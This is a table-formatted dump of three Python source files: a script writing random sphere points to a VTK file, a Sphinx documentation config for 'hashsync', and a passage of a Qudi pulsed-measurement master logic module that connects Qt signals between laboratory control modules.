code stringlengths 3 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int64 3 1.05M |
|---|---|---|---|---|---|
from math import pi, cos, sin
from random import random
class Point:
    """A 3D point with x, y and z coordinates."""

    def __init__(self, x, y, z):
        self.x = x
        self.y = y
        self.z = z


filename = "sphere.vtk"
print(filename)

# Sample 10000 points uniformly on the unit sphere: z uniform in [-1, 1)
# and azimuth s uniform in [0, 2*pi) gives a uniform surface distribution
# (Archimedes' hat-box theorem).
vp = []
for _ in range(10000):
    z = random() * 2.0 - 1.0
    s = random() * 2.0 * pi
    r = (1.0 - z ** 2) ** 0.5  # radius of the circle at height z (computed once)
    vp.append(Point(r * cos(s), r * sin(s), z))

# Write a legacy-format VTK unstructured grid.  The "with" block guarantees
# the file is flushed and closed even on error (the handle was leaked before).
with open(filename, "w") as f:
    f.write(f"""\
# vtk DataFile Version 2.0
unstructured
ASCII
DATASET UNSTRUCTURED_GRID
POINTS {len(vp)} float
""")
    for v in vp:
        f.write(f"{v.x} {v.y} {v.z}\n")
    # Tangential vector field: a rotation about the z axis.
    f.write(f"""\
POINT_DATA {len(vp)}
VECTORS vector float
""")
    for v in vp:
        f.write(f"{v.y} {-v.x} 0\n")
    # Scalar field: the z coordinate.  "default" (was misspelled "defalut")
    # makes VTK readers use the default lookup table as intended.
    f.write("SCALARS z float\n")
    f.write("LOOKUP_TABLE default\n")
    for v in vp:
        f.write(f"{v.z}\n")
| kaityo256/paraview-sample | unstructured/sphere.py | Python | mit | 787 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# hashsync documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os

# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))

# Get the project root dir, which is the parent dir of this docs directory
# (conf.py is executed with the docs dir as the current working directory).
cwd = os.getcwd()
project_root = os.path.dirname(cwd)

# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)

# Imported only after the sys.path tweak above so the local checkout of the
# package (not any installed copy) supplies __version__ below.
import hashsync

# -- General configuration ---------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix of source filenames.
source_suffix = '.rst'

# The encoding of source files.
#source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = u'hashsync'
copyright = u'2014, Chris AtLee'

# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = hashsync.__version__
# The full version, including alpha/beta/rc tags.
release = hashsync.__version__

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None

# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']

# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None

# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []

# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False

# -- Options for HTML output -------------------------------------------

# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'

# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}

# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []

# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None

# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None

# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None

# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None

# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']

# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'

# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True

# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}

# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}

# If false, no module index is generated.
#html_domain_indices = True

# If false, no index is generated.
#html_use_index = True

# If true, the index is split into individual pages for each letter.
#html_split_index = False

# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True

# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True

# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True

# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''

# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None

# Output file base name for HTML help builder.
htmlhelp_basename = 'hashsyncdoc'

# -- Options for LaTeX output ------------------------------------------

latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    #'papersize': 'letterpaper',

    # The font size ('10pt', '11pt' or '12pt').
    #'pointsize': '10pt',

    # Additional stuff for the LaTeX preamble.
    #'preamble': '',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
    ('index', 'hashsync.tex',
     u'hashsync Documentation',
     u'Chris AtLee', 'manual'),
]

# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None

# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False

# If true, show page references after internal links.
#latex_show_pagerefs = False

# If true, show URL addresses after external links.
#latex_show_urls = False

# Documents to append as an appendix to all manuals.
#latex_appendices = []

# If false, no module index is generated.
#latex_domain_indices = True

# -- Options for manual page output ------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'hashsync',
     u'hashsync Documentation',
     [u'Chris AtLee'], 1)
]

# If true, show URL addresses after external links.
#man_show_urls = False

# -- Options for Texinfo output ----------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
    ('index', 'hashsync',
     u'hashsync Documentation',
     u'Chris AtLee',
     'hashsync',
     'One line description of project.',
     'Miscellaneous'),
]

# Documents to append as an appendix to all manuals.
#texinfo_appendices = []

# If false, no module index is generated.
#texinfo_domain_indices = True

# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'

# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| catlee/hashsync | docs/conf.py | Python | bsd-3-clause | 8,396 |
# -*- coding: utf-8 -*-
"""
Master logic to combine sequence_generator_logic and pulsed_measurement_logic to be
used with a single GUI.
QuDi is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
QuDi is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with QuDi. If not, see <http://www.gnu.org/licenses/>.
Copyright (c) the Qudi Developers. See the COPYRIGHT.txt file at the
top-level directory of this distribution and at <https://github.com/Ulm-IQO/qudi/>
"""
from logic.generic_logic import GenericLogic
from pyqtgraph.Qt import QtCore
from collections import OrderedDict
import numpy as np
class PulsedMasterLogic(GenericLogic):
    """
    This logic module controls the sequence/waveform generation and management via
    sequence_generator_logic and pulsed measurements via pulsed_measurement_logic.
    Basically glue logic to pass information between logic modules.

    Three groups of Qt signals are declared below:
      * signals emitted by this module to control pulsed_measurement_logic,
      * signals emitted by this module to control sequence_generator_logic,
      * signals emitted by this module towards the GUI to forward status updates.
    All of them are connected with QtCore.Qt.QueuedConnection in on_activate.
    """
    # pulsed_measurement_logic control signals
    sigLaserToShowChanged = QtCore.Signal(int, bool)
    sigDoFit = QtCore.Signal(str)
    sigStartMeasurement = QtCore.Signal()
    sigStopMeasurement = QtCore.Signal()
    sigPauseMeasurement = QtCore.Signal()
    sigContinueMeasurement = QtCore.Signal()
    sigStartPulser = QtCore.Signal()
    sigStopPulser = QtCore.Signal()
    sigFastCounterSettingsChanged = QtCore.Signal(float, float)
    sigMeasurementSequenceSettingsChanged = QtCore.Signal(np.ndarray, int, float, list, bool, float)
    sigPulseGeneratorSettingsChanged = QtCore.Signal(float, str, dict, bool)
    sigUploadAsset = QtCore.Signal(str)
    sigLoadAsset = QtCore.Signal(str, dict)
    sigClearPulseGenerator = QtCore.Signal()
    sigExtMicrowaveSettingsChanged = QtCore.Signal(float, float, bool)
    sigExtMicrowaveStartStop = QtCore.Signal(bool)
    sigTimerIntervalChanged = QtCore.Signal(float)
    sigAnalysisWindowsChanged = QtCore.Signal(int, int, int, int)
    sigManuallyPullData = QtCore.Signal()
    sigRequestMeasurementInitValues = QtCore.Signal()
    sigAnalysisMethodChanged = QtCore.Signal(float)
    # sequence_generator_logic control signals
    sigSavePulseBlock = QtCore.Signal(str, object)
    sigSaveBlockEnsemble = QtCore.Signal(str, object)
    sigSaveSequence = QtCore.Signal(str, object)
    sigDeletePulseBlock = QtCore.Signal(str)
    sigDeleteBlockEnsemble = QtCore.Signal(str)
    sigDeleteSequence = QtCore.Signal(str)
    sigLoadPulseBlock = QtCore.Signal(str)
    sigLoadBlockEnsemble = QtCore.Signal(str)
    sigLoadSequence = QtCore.Signal(str)
    sigSampleBlockEnsemble = QtCore.Signal(str, bool, bool)
    sigSampleSequence = QtCore.Signal(str, bool, bool)
    sigGeneratorSettingsChanged = QtCore.Signal(list, str, float, dict)
    sigRequestGeneratorInitValues = QtCore.Signal()
    sigGeneratePredefinedSequence = QtCore.Signal(str, list)
    # signals for master module (i.e. GUI) — forwarded status updates
    sigSavedPulseBlocksUpdated = QtCore.Signal(dict)
    sigSavedBlockEnsemblesUpdated = QtCore.Signal(dict)
    sigSavedSequencesUpdated = QtCore.Signal(dict)
    sigCurrentPulseBlockUpdated = QtCore.Signal(object)
    sigCurrentBlockEnsembleUpdated = QtCore.Signal(object)
    sigCurrentSequenceUpdated = QtCore.Signal(object)
    sigBlockEnsembleSampled = QtCore.Signal(str)
    sigSequenceSampled = QtCore.Signal(str)
    sigGeneratorSettingsUpdated = QtCore.Signal(str, list, float, dict, str)
    sigPredefinedSequencesUpdated = QtCore.Signal(dict)
    sigPredefinedSequenceGenerated = QtCore.Signal(str)
    sigSignalDataUpdated = QtCore.Signal(np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray)
    sigLaserDataUpdated = QtCore.Signal(np.ndarray, np.ndarray)
    sigLaserToShowUpdated = QtCore.Signal(int, bool)
    sigElapsedTimeUpdated = QtCore.Signal(float, str)
    sigFitUpdated = QtCore.Signal(str, np.ndarray, np.ndarray, dict, object)
    sigMeasurementStatusUpdated = QtCore.Signal(bool, bool)
    sigPulserRunningUpdated = QtCore.Signal(bool)
    sigFastCounterSettingsUpdated = QtCore.Signal(float, float)
    sigMeasurementSequenceSettingsUpdated = QtCore.Signal(np.ndarray, int, float, list, bool, float)
    sigPulserSettingsUpdated = QtCore.Signal(float, str, list, dict, bool)
    sigAssetUploaded = QtCore.Signal(str)
    sigUploadedAssetsUpdated = QtCore.Signal(list)
    sigLoadedAssetUpdated = QtCore.Signal(str, str)
    sigExtMicrowaveSettingsUpdated = QtCore.Signal(float, float, bool)
    sigExtMicrowaveRunningUpdated = QtCore.Signal(bool)
    sigTimerIntervalUpdated = QtCore.Signal(float)
    sigAnalysisWindowsUpdated = QtCore.Signal(int, int, int, int)
    sigAnalysisMethodUpdated = QtCore.Signal(float)

    # qudi module identification
    _modclass = 'pulsedmasterlogic'
    _modtype = 'logic'
    # declare connectors (input: the two logic modules this module glues together)
    _in = {'pulsedmeasurementlogic': 'PulsedMeasurementLogic',
           'sequencegeneratorlogic': 'SequenceGeneratorLogic',
           }
    _out = {'pulsedmasterlogic': 'PulsedMasterLogic'}
def __init__(self, **kwargs):
    """ Create PulsedMasterLogic object with connectors.

    @param dict kwargs: optional parameters passed through to GenericLogic
    """
    super().__init__(**kwargs)
def on_activate(self, e):
    """ Initialisation performed during activation of the module.

    Fetches the two connected logic modules and wires up all signals:
    control signals of this module to the corresponding slots of
    pulsed_measurement_logic / sequence_generator_logic, and the status
    signals of those modules to the forwarding slots defined below.
    All connections are queued so cross-thread delivery is safe.

    @param object e: Fysom state change event
    """
    self._measurement_logic = self.get_in_connector('pulsedmeasurementlogic')
    self._generator_logic = self.get_in_connector('sequencegeneratorlogic')

    # Initialise the status bookkeeping before any connection is made so a
    # queued slot can never observe a half-initialised dict.
    self.status_dict = OrderedDict()
    self.status_dict['sauplo_busy'] = False
    self.status_dict['loading_busy'] = False
    self.status_dict['upload_busy'] = False
    self.status_dict['sampling_busy'] = False
    self.status_dict['pulser_running'] = False
    self.status_dict['measurement_running'] = False
    # Written by ext_microwave_running_updated(); initialise it here so the
    # key always exists even before the first microwave status update.
    self.status_dict['microwave_running'] = False

    # Signals controlling the pulsed_measurement_logic
    self.sigRequestMeasurementInitValues.connect(self._measurement_logic.request_init_values,
                                                 QtCore.Qt.QueuedConnection)
    self.sigMeasurementSequenceSettingsChanged.connect(
        self._measurement_logic.set_pulse_sequence_properties, QtCore.Qt.QueuedConnection)
    self.sigFastCounterSettingsChanged.connect(
        self._measurement_logic.set_fast_counter_settings, QtCore.Qt.QueuedConnection)
    self.sigExtMicrowaveSettingsChanged.connect(self._measurement_logic.set_microwave_params,
                                                QtCore.Qt.QueuedConnection)
    self.sigExtMicrowaveStartStop.connect(self._measurement_logic.microwave_on_off,
                                          QtCore.Qt.QueuedConnection)
    self.sigPulseGeneratorSettingsChanged.connect(
        self._measurement_logic.set_pulse_generator_settings, QtCore.Qt.QueuedConnection)
    self.sigAnalysisWindowsChanged.connect(self._measurement_logic.set_analysis_windows,
                                           QtCore.Qt.QueuedConnection)
    self.sigDoFit.connect(self._measurement_logic.do_fit, QtCore.Qt.QueuedConnection)
    self.sigTimerIntervalChanged.connect(self._measurement_logic.set_timer_interval,
                                         QtCore.Qt.QueuedConnection)
    self.sigManuallyPullData.connect(self._measurement_logic.manually_pull_data,
                                     QtCore.Qt.QueuedConnection)
    self.sigStartMeasurement.connect(self._measurement_logic.start_pulsed_measurement,
                                     QtCore.Qt.QueuedConnection)
    self.sigStopMeasurement.connect(self._measurement_logic.stop_pulsed_measurement,
                                    QtCore.Qt.QueuedConnection)
    self.sigPauseMeasurement.connect(self._measurement_logic.pause_pulsed_measurement,
                                     QtCore.Qt.QueuedConnection)
    # BUGFIX: was connected to pause_pulsed_measurement (copy-paste error),
    # so requesting "continue" paused the measurement again.
    self.sigContinueMeasurement.connect(self._measurement_logic.continue_pulsed_measurement,
                                        QtCore.Qt.QueuedConnection)
    self.sigStartPulser.connect(self._measurement_logic.pulse_generator_on,
                                QtCore.Qt.QueuedConnection)
    self.sigStopPulser.connect(self._measurement_logic.pulse_generator_off,
                               QtCore.Qt.QueuedConnection)
    self.sigClearPulseGenerator.connect(self._measurement_logic.clear_pulser,
                                        QtCore.Qt.QueuedConnection)
    self.sigUploadAsset.connect(self._measurement_logic.upload_asset,
                                QtCore.Qt.QueuedConnection)
    self.sigLoadAsset.connect(self._measurement_logic.load_asset, QtCore.Qt.QueuedConnection)
    self.sigLaserToShowChanged.connect(self._measurement_logic.set_laser_to_show,
                                       QtCore.Qt.QueuedConnection)
    self.sigAnalysisMethodChanged.connect(self._measurement_logic.analysis_method_changed,
                                          QtCore.Qt.QueuedConnection)

    # Signals controlling the sequence_generator_logic
    self.sigRequestGeneratorInitValues.connect(self._generator_logic.request_init_values,
                                               QtCore.Qt.QueuedConnection)
    self.sigSavePulseBlock.connect(self._generator_logic.save_block, QtCore.Qt.QueuedConnection)
    self.sigSaveBlockEnsemble.connect(self._generator_logic.save_ensemble,
                                      QtCore.Qt.QueuedConnection)
    self.sigSaveSequence.connect(self._generator_logic.save_sequence,
                                 QtCore.Qt.QueuedConnection)
    self.sigLoadPulseBlock.connect(self._generator_logic.load_block, QtCore.Qt.QueuedConnection)
    self.sigLoadBlockEnsemble.connect(self._generator_logic.load_ensemble,
                                      QtCore.Qt.QueuedConnection)
    self.sigLoadSequence.connect(self._generator_logic.load_sequence,
                                 QtCore.Qt.QueuedConnection)
    self.sigDeletePulseBlock.connect(self._generator_logic.delete_block,
                                     QtCore.Qt.QueuedConnection)
    self.sigDeleteBlockEnsemble.connect(self._generator_logic.delete_ensemble,
                                        QtCore.Qt.QueuedConnection)
    self.sigDeleteSequence.connect(self._generator_logic.delete_sequence,
                                   QtCore.Qt.QueuedConnection)
    self.sigSampleBlockEnsemble.connect(self._generator_logic.sample_pulse_block_ensemble,
                                        QtCore.Qt.QueuedConnection)
    self.sigSampleSequence.connect(self._generator_logic.sample_pulse_sequence,
                                   QtCore.Qt.QueuedConnection)
    self.sigGeneratorSettingsChanged.connect(self._generator_logic.set_settings,
                                             QtCore.Qt.QueuedConnection)
    self.sigGeneratePredefinedSequence.connect(
        self._generator_logic.generate_predefined_sequence, QtCore.Qt.QueuedConnection)

    # connect signals coming from the pulsed_measurement_logic
    self._measurement_logic.sigSignalDataUpdated.connect(self.signal_data_updated,
                                                         QtCore.Qt.QueuedConnection)
    self._measurement_logic.sigLaserDataUpdated.connect(self.laser_data_updated,
                                                        QtCore.Qt.QueuedConnection)
    self._measurement_logic.sigLaserToShowUpdated.connect(self.laser_to_show_updated,
                                                          QtCore.Qt.QueuedConnection)
    self._measurement_logic.sigElapsedTimeUpdated.connect(self.measurement_time_updated,
                                                          QtCore.Qt.QueuedConnection)
    self._measurement_logic.sigFitUpdated.connect(self.fit_updated, QtCore.Qt.QueuedConnection)
    self._measurement_logic.sigMeasurementRunningUpdated.connect(
        self.measurement_status_updated, QtCore.Qt.QueuedConnection)
    self._measurement_logic.sigPulserRunningUpdated.connect(self.pulser_running_updated,
                                                            QtCore.Qt.QueuedConnection)
    self._measurement_logic.sigFastCounterSettingsUpdated.connect(
        self.fast_counter_settings_updated, QtCore.Qt.QueuedConnection)
    self._measurement_logic.sigPulseSequenceSettingsUpdated.connect(
        self.measurement_sequence_settings_updated, QtCore.Qt.QueuedConnection)
    self._measurement_logic.sigPulseGeneratorSettingsUpdated.connect(
        self.pulse_generator_settings_updated, QtCore.Qt.QueuedConnection)
    self._measurement_logic.sigUploadAssetComplete.connect(self.upload_asset_finished,
                                                           QtCore.Qt.QueuedConnection)
    self._measurement_logic.sigUploadedAssetsUpdated.connect(self.uploaded_assets_updated,
                                                             QtCore.Qt.QueuedConnection)
    self._measurement_logic.sigLoadedAssetUpdated.connect(self.loaded_asset_updated,
                                                          QtCore.Qt.QueuedConnection)
    self._measurement_logic.sigExtMicrowaveSettingsUpdated.connect(
        self.ext_microwave_settings_updated, QtCore.Qt.QueuedConnection)
    self._measurement_logic.sigExtMicrowaveRunningUpdated.connect(
        self.ext_microwave_running_updated, QtCore.Qt.QueuedConnection)
    self._measurement_logic.sigTimerIntervalUpdated.connect(self.analysis_interval_updated,
                                                            QtCore.Qt.QueuedConnection)
    self._measurement_logic.sigAnalysisWindowsUpdated.connect(self.analysis_windows_updated,
                                                              QtCore.Qt.QueuedConnection)
    self._measurement_logic.sigAnalysisMethodUpdated.connect(self.analysis_method_updated,
                                                             QtCore.Qt.QueuedConnection)

    # connect signals coming from the sequence_generator_logic
    self._generator_logic.sigBlockDictUpdated.connect(self.saved_pulse_blocks_updated,
                                                      QtCore.Qt.QueuedConnection)
    self._generator_logic.sigEnsembleDictUpdated.connect(self.saved_block_ensembles_updated,
                                                         QtCore.Qt.QueuedConnection)
    self._generator_logic.sigSequenceDictUpdated.connect(self.saved_sequences_updated,
                                                         QtCore.Qt.QueuedConnection)
    self._generator_logic.sigSampleEnsembleComplete.connect(self.sample_ensemble_finished,
                                                            QtCore.Qt.QueuedConnection)
    self._generator_logic.sigSampleSequenceComplete.connect(self.sample_sequence_finished,
                                                            QtCore.Qt.QueuedConnection)
    self._generator_logic.sigCurrentBlockUpdated.connect(self.current_pulse_block_updated,
                                                         QtCore.Qt.QueuedConnection)
    self._generator_logic.sigCurrentEnsembleUpdated.connect(self.current_block_ensemble_updated,
                                                            QtCore.Qt.QueuedConnection)
    self._generator_logic.sigCurrentSequenceUpdated.connect(self.current_sequence_updated,
                                                            QtCore.Qt.QueuedConnection)
    self._generator_logic.sigSettingsUpdated.connect(self.generator_settings_updated,
                                                     QtCore.Qt.QueuedConnection)
    self._generator_logic.sigPredefinedSequencesUpdated.connect(
        self.predefined_sequences_updated, QtCore.Qt.QueuedConnection)
    self._generator_logic.sigPredefinedSequenceGenerated.connect(
        self.predefined_sequence_generated, QtCore.Qt.QueuedConnection)
def on_deactivate(self, e):
    """ Deactivation performed when the module is shut down.

    Disconnects every signal that was connected in on_activate, mirroring
    the connect order so the two methods can be audited side by side.

    @param object e: Fysom state change event
    @return: None
    """
    # Disconnect all signals
    # Signals controlling the pulsed_measurement_logic
    self.sigRequestMeasurementInitValues.disconnect()
    self.sigMeasurementSequenceSettingsChanged.disconnect()
    self.sigFastCounterSettingsChanged.disconnect()
    self.sigExtMicrowaveSettingsChanged.disconnect()
    self.sigExtMicrowaveStartStop.disconnect()
    self.sigPulseGeneratorSettingsChanged.disconnect()
    self.sigAnalysisWindowsChanged.disconnect()
    self.sigDoFit.disconnect()
    self.sigTimerIntervalChanged.disconnect()
    self.sigManuallyPullData.disconnect()
    self.sigStartMeasurement.disconnect()
    self.sigStopMeasurement.disconnect()
    self.sigPauseMeasurement.disconnect()
    self.sigContinueMeasurement.disconnect()
    self.sigStartPulser.disconnect()
    self.sigStopPulser.disconnect()
    self.sigClearPulseGenerator.disconnect()
    self.sigUploadAsset.disconnect()
    self.sigLoadAsset.disconnect()
    self.sigLaserToShowChanged.disconnect()
    self.sigAnalysisMethodChanged.disconnect()
    # Signals controlling the sequence_generator_logic
    self.sigRequestGeneratorInitValues.disconnect()
    self.sigSavePulseBlock.disconnect()
    self.sigSaveBlockEnsemble.disconnect()
    self.sigSaveSequence.disconnect()
    self.sigLoadPulseBlock.disconnect()
    self.sigLoadBlockEnsemble.disconnect()
    self.sigLoadSequence.disconnect()
    self.sigDeletePulseBlock.disconnect()
    self.sigDeleteBlockEnsemble.disconnect()
    self.sigDeleteSequence.disconnect()
    self.sigSampleBlockEnsemble.disconnect()
    self.sigSampleSequence.disconnect()
    self.sigGeneratorSettingsChanged.disconnect()
    self.sigGeneratePredefinedSequence.disconnect()
    # Signals coming from the pulsed_measurement_logic
    self._measurement_logic.sigSignalDataUpdated.disconnect()
    self._measurement_logic.sigLaserDataUpdated.disconnect()
    self._measurement_logic.sigLaserToShowUpdated.disconnect()
    self._measurement_logic.sigElapsedTimeUpdated.disconnect()
    self._measurement_logic.sigFitUpdated.disconnect()
    self._measurement_logic.sigMeasurementRunningUpdated.disconnect()
    self._measurement_logic.sigPulserRunningUpdated.disconnect()
    self._measurement_logic.sigFastCounterSettingsUpdated.disconnect()
    self._measurement_logic.sigPulseSequenceSettingsUpdated.disconnect()
    self._measurement_logic.sigPulseGeneratorSettingsUpdated.disconnect()
    # BUGFIX: sigUploadAssetComplete is connected in on_activate but was
    # never disconnected here, leaving a dangling connection on reload.
    self._measurement_logic.sigUploadAssetComplete.disconnect()
    self._measurement_logic.sigUploadedAssetsUpdated.disconnect()
    self._measurement_logic.sigLoadedAssetUpdated.disconnect()
    self._measurement_logic.sigExtMicrowaveSettingsUpdated.disconnect()
    self._measurement_logic.sigExtMicrowaveRunningUpdated.disconnect()
    self._measurement_logic.sigTimerIntervalUpdated.disconnect()
    self._measurement_logic.sigAnalysisWindowsUpdated.disconnect()
    self._measurement_logic.sigAnalysisMethodUpdated.disconnect()
    # Signals coming from the sequence_generator_logic
    self._generator_logic.sigBlockDictUpdated.disconnect()
    self._generator_logic.sigEnsembleDictUpdated.disconnect()
    self._generator_logic.sigSequenceDictUpdated.disconnect()
    self._generator_logic.sigSampleEnsembleComplete.disconnect()
    self._generator_logic.sigSampleSequenceComplete.disconnect()
    self._generator_logic.sigCurrentBlockUpdated.disconnect()
    self._generator_logic.sigCurrentEnsembleUpdated.disconnect()
    self._generator_logic.sigCurrentSequenceUpdated.disconnect()
    self._generator_logic.sigSettingsUpdated.disconnect()
    self._generator_logic.sigPredefinedSequencesUpdated.disconnect()
    self._generator_logic.sigPredefinedSequenceGenerated.disconnect()
    return
#######################################################################
### Pulsed measurement methods ###
#######################################################################
def request_measurement_init_values(self):
    """ Ask pulsed_measurement_logic to (re-)emit all of its current settings.

    Fire-and-forget via a queued signal; the values arrive asynchronously
    through the various *_updated slots of this module.

    @return: None
    """
    self.sigRequestMeasurementInitValues.emit()
    return
def get_hardware_constraints(self):
    """ Retrieve the hardware constraint dictionaries from the measurement logic.

    Direct (synchronous) call, unlike the queued-signal methods of this class.

    @return tuple: (pulse generator constraints, fast counter constraints)
    """
    fc_constraints = self._measurement_logic.get_fastcounter_constraints()
    pg_constraints = self._measurement_logic.get_pulser_constraints()
    return pg_constraints, fc_constraints
def get_fit_functions(self):
    """ Retrieve the available fit functions from the measurement logic.

    Direct (synchronous) pass-through call.

    @return: whatever pulsed_measurement_logic.get_fit_functions() returns
    """
    return self._measurement_logic.get_fit_functions()
def measurement_sequence_settings_changed(self, measurement_ticks, number_of_lasers,
                                          sequence_length_s, laser_ignore_list, alternating,
                                          laser_trigger_delay):
    """ Forward new measurement sequence settings (e.g. from the GUI) to the
    measurement logic via a queued signal.

    @param numpy.ndarray measurement_ticks: x-axis values of the measurement
    @param int number_of_lasers: number of laser pulses in the sequence
    @param float sequence_length_s: total sequence length in seconds
    @param list laser_ignore_list: laser pulse indices to exclude from analysis
    @param bool alternating: whether the sequence alternates between two signals
    @param float laser_trigger_delay: laser trigger delay (presumably seconds;
                                      confirm in pulsed_measurement_logic)
    @return: None
    """
    self.sigMeasurementSequenceSettingsChanged.emit(measurement_ticks, number_of_lasers,
                                                    sequence_length_s, laser_ignore_list,
                                                    alternating, laser_trigger_delay)
    return
def measurement_sequence_settings_updated(self, measurement_ticks, number_of_lasers,
                                          sequence_length_s, laser_ignore_list, alternating,
                                          laser_trigger_delay):
    """ Slot for the measurement logic's settings-updated signal; forwards the
    confirmed settings to the GUI.

    Parameters mirror measurement_sequence_settings_changed().

    @return: None
    """
    self.sigMeasurementSequenceSettingsUpdated.emit(measurement_ticks, number_of_lasers,
                                                    sequence_length_s, laser_ignore_list,
                                                    alternating, laser_trigger_delay)
    return
def fast_counter_settings_changed(self, bin_width_s, record_length_s):
    """ Forward new fast counter settings to the measurement logic.

    @param float bin_width_s: counter bin width in seconds
    @param float record_length_s: record length in seconds
    @return: None
    """
    self.sigFastCounterSettingsChanged.emit(bin_width_s, record_length_s)
    return
def fast_counter_settings_updated(self, bin_width_s, record_length_s):
    """ Slot for the measurement logic's confirmation; forwards the applied
    fast counter settings to the GUI.

    @param float bin_width_s: counter bin width in seconds
    @param float record_length_s: record length in seconds
    @return: None
    """
    self.sigFastCounterSettingsUpdated.emit(bin_width_s, record_length_s)
    return
def ext_microwave_settings_changed(self, frequency_hz, power_dbm, use_ext_microwave):
    """ Forward new external microwave settings to the measurement logic.

    @param float frequency_hz: microwave frequency in Hz
    @param float power_dbm: microwave power in dBm
    @param bool use_ext_microwave: whether the external microwave source is used
    @return: None
    """
    self.sigExtMicrowaveSettingsChanged.emit(frequency_hz, power_dbm, use_ext_microwave)
    return
def ext_microwave_settings_updated(self, frequency_hz, power_dbm, use_ext_microwave):
    """ Slot for the measurement logic's confirmation; forwards the applied
    external microwave settings to the GUI.

    @param float frequency_hz: microwave frequency in Hz
    @param float power_dbm: microwave power in dBm
    @param bool use_ext_microwave: whether the external microwave source is used
    @return: None
    """
    self.sigExtMicrowaveSettingsUpdated.emit(frequency_hz, power_dbm, use_ext_microwave)
    return
def ext_microwave_toggled(self, output_on):
    """ Request switching the external microwave output on or off.

    @param bool output_on: True to switch the output on, False to switch it off
    @return: None
    """
    self.sigExtMicrowaveStartStop.emit(output_on)
    return
def ext_microwave_running_updated(self, is_running):
    """ Slot for the measurement logic's microwave status signal; records the
    state in status_dict and forwards it to the GUI.

    @param bool is_running: current on/off state of the external microwave
    @return: None
    """
    self.status_dict['microwave_running'] = is_running
    self.sigExtMicrowaveRunningUpdated.emit(is_running)
    return
def pulse_generator_settings_changed(self, sample_rate_hz, activation_config_name,
                                     analogue_amplitude, interleave_on):
    """ Forward new pulse generator settings to the measurement logic.

    @param float sample_rate_hz: generator sample rate in Hz
